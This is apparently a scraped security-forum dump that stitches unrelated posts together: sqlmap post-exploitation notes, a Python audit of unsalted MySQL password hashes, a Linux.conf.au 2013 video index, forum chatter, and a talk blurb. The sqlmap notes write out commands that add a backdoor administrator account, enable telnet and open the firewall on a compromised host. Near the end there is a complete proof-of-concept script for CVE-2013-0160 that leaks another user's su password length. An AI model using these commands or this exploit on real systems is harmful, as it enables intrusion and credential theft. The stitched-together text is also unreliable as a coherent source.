View transaction: tcpdump -i eth1 -vvv -X

1st Stage Uploader
2nd Stage Command Shell Page

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

--------------------------------------------------
Interacting Directly with sqlmap O/S Shell Backdoor
--------------------------------------------------
http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

--------------------------------------------------
Direct connection to the database
--------------------------------------------------
Installing Py-MySQL Dependency
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

Source: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool
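The mysql.user dump and the john `--format=mysql-sha1` step in the notes above both depend on one property of the mysql_native_password scheme (the MySQL default before 8.0 switched to caching_sha2_password): the stored value is `*` followed by the uppercase hex of SHA1(SHA1(password)), with no salt. The following added example, which is not part of the Rapid7 notes or of sqlmap, reimplements that hash on the defender's side to audit a dump for the two findings that matter most: accounts whose password column is empty, and accounts whose hash equals the hash of a known-weak password. The sample rows are the ones printed above plus one constructed `appuser` row whose hash is PASSWORD('password'); `WEAK_PASSWORDS` is an assumed, deliberately tiny list.

```python
import hashlib


def mysql41_hash(password: str) -> str:
    """Reproduce mysql_native_password's PASSWORD(): '*' + HEX(SHA1(SHA1(pw))).

    There is no salt, so equal passwords always produce equal hashes and one
    precomputed table serves against every account in every dump.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_user_dump(lines):
    """Parse sqlmap-style '[*] User, Password, Host, authentication_string'
    rows into dicts. Empty fields are kept so missing passwords stay visible."""
    rows = []
    for line in lines:
        line = line.strip()
        if not line.startswith("[*]"):
            continue
        fields = [f.strip() for f in line[3:].split(",")]
        fields += [""] * (4 - len(fields))  # pad rows that lost a trailing field
        rows.append({"user": fields[0], "hash": fields[1], "host": fields[2]})
    return rows


def audit_accounts(rows, weak_passwords):
    """Return (user, host, reason) findings: empty passwords and hashes that
    match any supplied weak password. Hashing the list once is enough because
    the scheme is unsalted."""
    lookup = {mysql41_hash(p): p for p in weak_passwords}
    findings = []
    for r in rows:
        user = r["user"] or "<anonymous>"
        if r["hash"] == "":
            findings.append((user, r["host"], "empty password"))
        elif r["hash"] in lookup:
            findings.append((user, r["host"], "weak password: " + lookup[r["hash"]]))
    return findings


# Rows copied from the sqlmap output above, plus one constructed 'appuser' row
# (not from the original notes) whose hash is mysql41_hash("password").
SAMPLE_DUMP = """
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,
[*] appuser, *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19, %,
""".strip().splitlines()

# Assumed, deliberately tiny weak-password list for the demonstration.
WEAK_PASSWORDS = ["password", "123456", "root", "toor", "admin"]


def run_audit():
    """Audit the embedded sample dump against the weak-password list."""
    return audit_accounts(parse_user_dump(SAMPLE_DUMP), WEAK_PASSWORDS)


if __name__ == "__main__":
    for user, host, reason in run_audit():
        print(f"{user}@{host}: {reason}")
```

Five of the nine rows from the dump have no password at all (two root logins, pma and the two anonymous accounts), which is the finding to act on first; the weak-password match is the second, and both are cheap to check precisely because the hash is unsalted, which is also why the john step above is fast against it.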
-
Linux.conf.au 2013 Videos

We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible.

Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way.

Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it.

Videos we know have problems:

Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13.

Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13.

Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source'. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13.

Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13.

Bufferbloat from a Plumber's point of view (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13.

The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13.

High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13.

Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13.

The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13.

Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13.

Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support!
Paul Wayper, AV Wrangler

Index of /linux.conf.au/2013/mp4 (Name, Last modified, Size):

Parent Directory                                                                                    -
3D_Printing_with_Repsnapper.mp4                                                   02-Feb-2013 18:00   88M
15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4                        03-Feb-2013 17:42   91M
A_New_Linux_Platform_Hardware_and_Software.mp4                                    03-Feb-2013 16:55   81M
After_Arduino.mp4                                                                 04-Feb-2013 10:13   66M
An_Introduction_to_Linux_IPC_Facilities.mp4                                       03-Feb-2013 12:21  260M
ArduSat_Open_Source_in_orbit.mp4                                                  02-Feb-2013 19:21   86M
Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4            04-Feb-2013 09:45   58M
Big_and_Little_Endian_inside_out.mp4                                              04-Feb-2013 10:25  112M
Bufferbloat_from_a_Plumbers_point_of_view.mp4                                     02-Feb-2013 17:46  7.6M
Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4          03-Feb-2013 17:41   23M
Building_a_free_software_telemetry_radio_system.mp4                               02-Feb-2013 21:05   63M
Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4                           03-Feb-2013 17:42   81M
Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4  03-Feb-2013 16:18  155M
Checkpoint_and_Restore_are_we_there_yet.mp4                                       02-Feb-2013 18:51   48M
Code_up_your_own_video_conference_in_HTML5.mp4                                    02-Feb-2013 19:08   66M
Concurrent_Programming_with_the_Disruptor.mp4                                     02-Feb-2013 20:05   54M
Conference_Closing.mp4                                                            03-Feb-2013 17:35  210M
Conference_Closing_Lightning_Talks.mp4                                            03-Feb-2013 17:20  124M
Copyrights_Dark_Clouds_Optus_v_NRL.mp4                                            02-Feb-2013 19:11  3.0M
Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4                02-Feb-2013 20:07  2.5M
Droids_that_talk_Pairing_Codec2_and_Android.mp4                                   04-Feb-2013 13:20   31M
Free_and_open_source_software_and_activism.mp4                                    04-Feb-2013 13:10  167K
Future_directions_for_the_X_Window_System.mp4                                     04-Feb-2013 09:45   87M
Geeks_rule_over_kings_the_Distributed_Democracy.mp4                               02-Feb-2013 19:20  3.0M
Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4 02-Feb-2013 18:48   31M
Git_For_Ages_4_And_Up.mp4                                                         02-Feb-2013 22:52  342M
Git_not_just_for_source_code_anymore.mp4                                          02-Feb-2013 20:29   74M
Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4                             03-Feb-2013 18:12   83M
HEADER.html                                                                       06-Feb-2013 11:05  4.4K
Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4   03-Feb-2013 16:38   87M
How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4  04-Feb-2013 09:27   69M
How_to_Fix_a_Font.mp4                                                             03-Feb-2013 00:15   77M
How_to_make_almost_anything_go_faster.mp4                                         03-Feb-2013 00:02   51M
How_to_use_Puppet_like_an_Adult.mp4                                               03-Feb-2013 11:56   85M
Keynote_Andrew_Bunnie_Huang.mp4                                                   03-Feb-2013 01:37   77M
Keynote_Radia_Perlman.mp4                                                         03-Feb-2013 11:33  117M
LTTng_20_Advanced_Linux_tracing_for_everyone.mp4                                  04-Feb-2013 12:19   86M
Lighting_up_OpenCV_with_Ne10_and_NEON.mp4                                         04-Feb-2013 09:34   56M
Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4   02-Feb-2013 20:19   35M
Main_conference_opening.mp4                                                       02-Feb-2013 17:57   84M
Make_your_software_understand_your_nonUS_accent.mp4                               02-Feb-2013 19:08   58M
Making_Mobile_Communications_Secure.mp4                                           04-Feb-2013 11:05  116M
Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4                              02-Feb-2013 19:34   71M
Making_UEFI_Secure_boot_work_for_you.mp4                                          02-Feb-2013 21:02   79M
Maximum_Clojure_Performance.mp4                                                   02-Feb-2013 21:04   71M
Measuring_and_Improving_OpenGL_Performance.mp4                                    02-Feb-2013 22:03   59M
MySQL_in_the_cloud_as_a_service.mp4                                               03-Feb-2013 17:17  166M
NetFPGA_USB_2_interface.mp4                                                       02-Feb-2013 22:40  148M
NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4                       03-Feb-2013 16:41   97M
OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4             04-Feb-2013 12:24   81M
OpenStack_Zuul.mp4                                                                04-Feb-2013 09:53   78M
Open_Source_Digital_Radio.mp4                                                     03-Feb-2013 00:06   79M
Open_Source_Firmware.mp4                                                          04-Feb-2013 13:05   47M
Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4        03-Feb-2013 00:03   96M
Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4           04-Feb-2013 09:17  1.4M
Playing_with_OpenStack_Swift.mp4                                                  03-Feb-2013 11:57   95M
Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4                                     03-Feb-2013 17:44  106M
PostgreSQL_92_Full_Throttle_Database.mp4                                          03-Feb-2013 16:09   96M
Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4                          03-Feb-2013 16:42   93M
Quantitative_community_management.mp4                                             03-Feb-2013 16:07   99M
Quiltwork_patch_deployment_in_nz_and_au.mp4                                       02-Feb-2013 23:11   72M
RAID_is_more_than_parity_and_mirrors.mp4                                          04-Feb-2013 10:04  122M
REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4                                  02-Feb-2013 20:19   74M
RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4            02-Feb-2013 19:12   23M
Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4                            02-Feb-2013 20:04   90M
Ript_a_terse_but_expressive_DSL_for_iptables.mp4                                  02-Feb-2013 21:40   68M
Ristretto_runtime_types_for_JavaScript.mp4                                        03-Feb-2013 17:00   83M
Scratching_your_own_itch_subsurface_diving_log.mp4                                03-Feb-2013 15:24  118M
Shell_for_Starters.mp4                                                            04-Feb-2013 12:09  135M
Software_Transactional_Memory_in_GCC_47.mp4                                       03-Feb-2013 17:14  151M
Stereographic_film_making_and_Linux.mp4                                           02-Feb-2013 23:09   86M
Systems_Administration_Server_and_Process_Behavior.mp4                            03-Feb-2013 01:08  282M
Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4               02-Feb-2013 19:25   41M
Teaching_the_X_server_new_tricks.mp4                                              04-Feb-2013 09:38  102M
The_IPocalypse_20_months_later.mp4                                                02-Feb-2013 19:25  177K
The_Perl_Renaissance.mp4                                                          02-Feb-2013 20:17   59M
The_Raspberry_Pi_and_Linux.mp4                                                    02-Feb-2013 21:45  159M
The_future_of_nonvolatile_memory.mp4                                              02-Feb-2013 19:24   49M
The_real_story_behind_Wayland_and_X.mp4                                           03-Feb-2013 15:51   68M
Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4                              02-Feb-2013 21:21   47M
Think_Create_Critique_Design.mp4                                                  02-Feb-2013 23:18   78M
Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4                          02-Feb-2013 23:18  121M
Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4                       03-Feb-2013 18:40  118M
Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4                              03-Feb-2013 00:37   96M
Two_years_of_LibreOffice.mp4                                                      03-Feb-2013 00:48  109M
UEFI_the_Converged_Firmware_Infrastructure.mp4                                    02-Feb-2013 21:48   95M
Using_Puppet_to_Model_Application_clusters.mp4                                    04-Feb-2013 10:23  101M
Using_open_source_in_over_1100_schools_in_New_Zealand.mp4                         02-Feb-2013 21:49  1.8M
Vampire_Mice_How_USB_PM_impacts_you.mp4                                           02-Feb-2013 23:03  121M
Why_kernel_space_sucks.mp4                                                        03-Feb-2013 15:51   63M
Wiggle_while_you_work.mp4                                                         03-Feb-2013 13:48   92M
gitannex.mp4                                                                      03-Feb-2013 18:29   61M
redgrep_from_regular_expression_derivatives_to_LLVM.mp4                           02-Feb-2013 18:58   60M
users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4      03-Feb-2013 14:37   94M

Source: Index of /linux.conf.au/2013/mp4
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Security news
Chinese experts slam U.S. hacking accusations - People's Daily Online
US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register
https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed
'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News
-
Yes, you're right, it's work for little money. But let's not forget that open source doesn't mean there is no funding. The big companies that effectively make money from open-source projects pay people to work on those projects. One example would be Intel, and an example of a project is the Linux kernel itself. If their processors didn't work on Linux it would be bad for them, so they invest in kernel programmers. It's much the same with other projects; in some cases donations or sponsorships are added on top, as with OpenSSL, which is waiting for $50K in sponsorship. But if we pay attention, we notice that it offers FIPS support, a certification that costs about $50K. What can be useful for these young people, besides learning many new and useful things, is that they end up working at big companies like Google, which will treat them well.
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Security news
Uuu, shit just got serious... We have the two camps: 1. The Chinese, with that old saying: How do the Chinese crack a password? Each of them tries one. That is, there are a lot of them -> potential. 2. The Americans, who are the guys with money and can pay some Indians $2 a year to do their dirty work. Who are you betting on?
-
From Jurnalul, the same news item: "The 334 participating students from 36 countries had to solve 1925 different tasks and assignments proposed by the open source organizations" "The 20 solved 576 tasks, Google Open Source announces" Apparently he worked on BRL-CAD | Open Source Solid Modeling . I'm curious whether these initiatives are OK, or whether the companies are just getting some kids to do their work. It seems the other projects there included Fedora, NetBSD, KDE and Haiku. Interesting.
-
Firefox will block any content based on Java, Reader and Silverlight
Nytro replied to Matt's topic in Security news
HTML 5 is coming, and then there will be no need for Java or Flash anymore.
-
SSL - Bridges between secure and insecure
Nytro replied to unixbreak's topic in Tutorials in English
Yes, nice article
-
[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h]

In part 8, STL digs into the do-while loop, casts, one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn.

See part 1: Name Lookup
See part 2: Template Argument Deduction
See part 3: Overload Resolution
See part 4: Virtual Functions
See part 5: Explicit and Partial Specialization
See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP)
See part 7: Usual Arithmetic Conversions and Template Metaprogramming

Source: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9
-
Rapid Blind Sql Injection Exploitation With Bbqsql

Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns.

This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests.

Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University.
Twitter: @mastahyeti
Ben Toews (mastahyeti)

Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University.
Twitter: @HelloArbit
Scott Behrens (Arbit)

Source: Rapid Blind Sql Injection Exploitation With Bbqsql
-
[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h]

#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" session before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {
  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {
  int fd;
  char buf[1024];

  signal(SIGINT, display_result);
  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);
  while(read(fd, buf, 1024))
    count++;
  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo " [*] Wait for someone to run \"su -\""
while true; do
  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})
  case ${x% *} in
    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp}; ${exe} &
       (( run = 1 )) ;;
    2) [ ! -z "$!" ] && kill -2 $!; break ;;
  esac
done

rm -f ${exe}{,.c} ${tmp}

Source: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
-
Capture a request and show me exactly how your browser sends it. That way I don't have to sit there with tcpdump, which would kill me.
-
http://i49.tinypic.com/2rz75n6.png
-
I think you're joking... They're not posted there with [ IMG ], they're just links. Imgur: Imageshack: Don't they show up for you?
-
Hell no, now there are lots from China, Indonesia, Brazil and other countries I've never heard of. How many visitors do we have: There are currently 1517 users online. 81 members and 1436 guests. Is that all the girls can do?

netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | sort -u
-
Portable UPnP SDK unique_service_name() Remote Code Execution
Nytro replied to Praetorian503's topic in Exploits
Details: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf